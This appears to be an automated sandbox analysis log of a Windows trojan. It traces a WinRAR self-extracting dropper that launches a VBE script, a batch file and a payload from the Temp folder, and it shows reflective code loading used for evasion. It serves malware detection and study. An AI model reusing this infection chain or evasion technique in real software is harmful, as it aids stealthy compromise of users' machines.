            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A3A3C0_2_005A3A3C
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B0B430_2_005B0B43
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005BCB600_2_005BCB60
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A5C770_2_005A5C77
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A3D6D0_2_005A3D6D
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059ED140_2_0059ED14
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AFDFA0_2_005AFDFA
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059DE6C0_2_0059DE6C
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059BE130_2_0059BE13
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B0F780_2_005B0F78
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_00595F3C0_2_00595F3C
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F133B05_2_00007FF848F133B0
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1AEED5_2_00007FF848F1AEED
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1B0755_2_00007FF848F1B075
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1CF885_2_00007FF848F1CF88
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1B0705_2_00007FF848F1B070
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1C9D85_2_00007FF848F1C9D8
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1A0375_2_00007FF848F1A037
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F12C185_2_00007FF848F12C18
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1A0375_2_00007FF848F1A037
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F12C185_2_00007FF848F12C18
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: String function: 005AED00 appears 31 times
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: String function: 005AE28C appears 35 times
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: String function: 005AE360 appears 52 times
            Source: Bridgecontainer.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: 5Ixz5yVfS7.exe, 00000000.00000003.2002063608.00000000074BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
            Source: 5Ixz5yVfS7.exe, 00000000.00000003.2001173301.0000000006A82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
            Source: 5Ixz5yVfS7.exe, 00000000.00000003.2001688992.000000000739C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
            Source: 5Ixz5yVfS7.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5Ixz5yVfS7.exe
            Source: 5Ixz5yVfS7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, XXuCjlVleq6FGUqy7MQ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, XXuCjlVleq6FGUqy7MQ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, XXuCjlVleq6FGUqy7MQ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, XXuCjlVleq6FGUqy7MQ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wAcUSUDELR6kZtl0aTO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wAcUSUDELR6kZtl0aTO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wAcUSUDELR6kZtl0aTO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wAcUSUDELR6kZtl0aTO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5Ixz5yVfS7.exe, 00000000.00000002.2006257651.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, 5Ixz5yVfS7.exe, 00000000.00000003.2005513162.0000000002F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: N5OHKOq3jR1X.vbp
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@1/1
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_00596EC9 GetLastError,FormatMessageW,0_2_00596EC9
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_005A9E1C
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\605c0baeda0702fc271102fdb526c6b0fef151cc
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeFile created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCommand line argument: sfxname0_2_005AD5D4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCommand line argument: sfxstime0_2_005AD5D4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCommand line argument: STARTDLG0_2_005AD5D4
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCommand line argument: xj^0_2_005AD5D4
            Source: 5Ixz5yVfS7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5Ixz5yVfS7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 5Ixz5yVfS7.exeReversingLabs: Detection: 68%
            Source: 5Ixz5yVfS7.exeVirustotal: Detection: 57%
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeFile read: C:\Users\user\Desktop\5Ixz5yVfS7.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\5Ixz5yVfS7.exe "C:\Users\user\Desktop\5Ixz5yVfS7.exe"
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"Jump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: mmdevapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: ksuser.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: avrt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: audioses.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeSection loaded: midimap.dllJump to behavior
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: 5Ixz5yVfS7.exeStatic file information: File size 1164920 > 1048576
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 5Ixz5yVfS7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: 5Ixz5yVfS7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5Ixz5yVfS7.exe
            Source: 5Ixz5yVfS7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 5Ixz5yVfS7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 5Ixz5yVfS7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 5Ixz5yVfS7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 5Ixz5yVfS7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx System.AppDomain.Load(byte[])
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx System.AppDomain.Load(byte[])
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx System.Reflection.Assembly.Load(byte[])
            Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TphSWr5eY0phEnDdXEe.cs.Net Code: dcKDIaQJMx
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeFile created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\__tmp_rar_sfx_access_check_7222078Jump to behavior
            Source: 5Ixz5yVfS7.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AE28C push eax; ret 0_2_005AE2AA
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005AED46 push ecx; ret 0_2_005AED59
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F1B075 pushad ; ret 5_2_00007FF848F1B139
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F12C98 pushad ; retf 5_2_00007FF848F12CC1
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F12CA8 pushad ; retf 5_2_00007FF848F12CC1
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeCode function: 5_2_00007FF848F12CB8 pushad ; retf 5_2_00007FF848F12CC1
